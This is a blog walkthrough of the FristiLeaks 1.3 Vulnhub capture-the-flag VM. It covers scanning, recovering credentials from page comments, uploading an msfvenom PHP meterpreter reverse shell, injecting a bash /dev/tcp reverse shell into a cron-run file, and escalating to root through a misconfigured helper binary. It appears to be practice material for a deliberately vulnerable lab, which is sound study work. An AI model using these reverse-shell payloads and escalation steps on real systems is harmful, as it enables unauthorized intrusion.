🖥️ Walkthrough / FristiLeaks: 1.3 🖥️

in #security7 years ago

So onto the next one something a touch harder this time.

Name: FristiLeaks: 1.3
Date release: 14 Dec 2015

Author: Ar0xA
Series: FristiLeaks
Web page: https://tldr.nu/2015/12/15/fristileaks-vm/
Vulnhub: https://www.vulnhub.com/entry/fristileaks-13,133/
Description:

A small VM made for a Dutch informal hacker meetup called Fristileaks. Meant to be broken in a few hours without requiring debuggers, >reverse engineering, etc..
VMware users will need to manually edit the VM's MAC address to: 08:00:27:A5:A6:76

🔥HOST DISCOVERY 🔥

ARP

netdiscover

ping

ping 192.168.0.17

🔥PORT SCANNING🔥

TCP

nmap -sS -A -sC -sV -O -p0- 192.168.0.17 -oA nmap_tcp_full_verOSscript

hmmm http only??

UDP

nmap -sU -n 192.168.0.17 -oA nmap_udp_def

no udp ports

🔥 SERVICE ENUMERATION 🔥

80 - http

http://192.168.0.17

so it looks like there is a little in robots.txt

http://192.168.0.17/robots.txt

http://192.168.0.17/cola
http://192.168.0.17/sisi/
http://192.168.0.17/beer

So all three links appear to troll me displaying the image below.

nikto -h 192.168.0.17 -p 80

dirb http://192.168.0.17

hmmm. Cant drink beer. Cant drink cola. Keep calm and Fristi

Theres clues right under your nose sometimes. I was stuck on this for a while

http://192.168.0.17/fristi/

now we got something a login portal

there are a few interesting comments i spotted in the page source

The image source suggests the wall of characters could be base64 encoded image

(html comment removed: 
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz
)
(html comment removed: 
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==
)

a user found eezeepz

in kali we could have used the base64 tool however being lazy i pulled up the first website to decode base64 ascii

https://www.base64decode.org/

pasted in the comment which returned the following image

next I was able to successfully login to the portal using

user: eezeepz
password: keKkeKKeKKeKkEkkEk

An upload page for us to abuse perhaps?

The upload function is restricted to images.

🔥 EXPLOITATION🔥

A quick searchsploit returns a few exploits nothing too relevant

Lets try upload a shell instead

with the information enumerated I build the shell with msfvenom

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.13 LPORT=4444 -f raw > shell.php.png

successful upload of the payload :D

before executing the payload we need to start the listener

set the payload, lhost and lport

started the listener. time to execute the payload. The browser loads indefinitely... this is a good sign

flick back to metasploit and BOOM we got a shell

i jump into standard shell. we are in as the apache user

🔥PRIV ESCALATION 🔥

So we now need to get root because apache just is not good enough.

First i moved into a bash shell as backspace was annoying me.

/bin/bash

This time i decided to manually go through some priv escalation commands in g0tm1lks cheat sheet. No cheating script this time

looking around we start to build up info
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

looking around we start to build up info

admin
eezeepz
fristigod

Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
vboxadd:x:498:1::/var/run/vboxadd:/bin/false
eezeepz:x:500:500::/home/eezeepz:/bin/bash
admin:x:501:501::/home/admin:/bin/bash
fristigod:x:502:502::/var/fristigod:/bin/bash
fristi:x:503:100::/var/www:/sbin/nologin

Eventually inside /home/eezeepz the notes.txt file contains some useful info

so we put the following code into the runthis fille to try and get the target machine to connect back to the attacking kali box on port 6666. This should be executed as admin also :P

echo "/usr/bin/dir && /bin/bash -i >& bash -i >& /dev/tcp/192.168.0.13/6666 0>&1" > /tmp/runthis

looking in cronresult looks like we have a hit

boom we got a shell

now we are admin. not good enough :( but a step up

continuing the hunt

cryptpass.py suggests the value above is base64 encoded then ROT13 encoded

after failing to get the python code to run on the target i jumped into python to reverse

LetThereBeFristi!

I suspected this was the password for one of the fristi users

fristigod:x:502:502::/var/fristigod:/bin/bash
fristi:x:503:100::/var/www:/sbin/nologin

we try to swtich to fristigod

need a tty. We know python is on here so
https://netsec.ws/?p=337

python -c 'import pty; pty.spawn("/bin/sh")'

google is always helpful

so now we successfully used the decoded string as the password for fristigod

straight away we see a interesting folder.secret_admin_stuff and inside file doCom

looking at the bash history reveals what fristigod has been doing

so looks like the command was spammed. The first one looks the most interesting where doCom runs the ls command. possibly under the context of root :O

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom whoami
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/sh

got root 😎😎😎

time to get the flag

got the flag🚩

Please follow me @shifty0g

Sort:  

I always enjoy a good write up. Good job and thanks for sharing!
I'm currently in the middle my eWPT exam. I plan on writing a review when I'm done. Currently writing my report. I'm bored of reporting and itching to get back to some vulnhub challenges.

good luck . Im building back to OSCP attempt 2 . templates and automation with scripts and alias' have helped me alot.

Good luck to you as well! I look forward to the oscp. Ecppt was a lot of fun.
Vulnhub has been my oscp prep for a long time now lol

this reminds me of when I went to tech school for IT, unfortunately my life took a different turn and I never went that way, but this would be cool to take on someday. might take me a few minutes to get back up to speed, who knows, maybe someday.

Coin Marketplace

STEEM 0.20
TRX 0.26
JST 0.039
BTC 100104.47
ETH 3619.58
USDT 1.00
SBD 3.10